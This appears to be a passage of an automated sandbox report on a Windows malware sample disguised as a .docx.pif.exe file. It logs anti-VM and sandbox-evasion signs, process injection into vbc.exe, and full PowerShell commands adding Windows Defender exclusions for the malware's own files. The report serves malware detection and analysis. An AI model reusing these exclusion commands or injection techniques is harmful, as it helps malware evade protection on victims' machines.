Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040F7A7 Sleep,ExitProcess,

15_2_0040F7A7

Opens the same file many times (likely Sandbox evasion)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File opened: \Device\RasAcd count: 189384

Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 2740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 4740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 77E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 6C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 87E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 97E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: 9B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: AB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: BB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: CDA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: DDA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: EDA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: F470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 12A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 4A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 72D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 82D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 9460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 9780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: A780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 72D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 8460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: 9780000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

15_2_0041A748

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6847	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 613	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 4819	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: foregroundWindowGot 1728	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

API coverage: 6.1 %

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe TID: 1856	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4284	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5580	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5580	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616	Thread sleep count: 390 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616	Thread sleep time: -1170000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748	Thread sleep time: -121000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616	Thread sleep count: 4819 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616	Thread sleep time: -14457000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748	Thread sleep count: 295 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748	Thread sleep time: -295000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe TID: 4196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0044E879 FindFirstFileExA,	15_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,	15_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

15_2_00407C97

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: TkdxROLUOVpK.exe, 0000000A.00000002.2137224054.0000000006D95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11de
Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

15_2_004349F9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

15_2_0041CB50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]

15_2_004432B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00412077 GetProcessHeap,HeapFree,

15_2_00412077

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00434B47 SetUnhandledExceptionFilter,	15_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00434FDC

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4D7A008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000	Jump to behavior
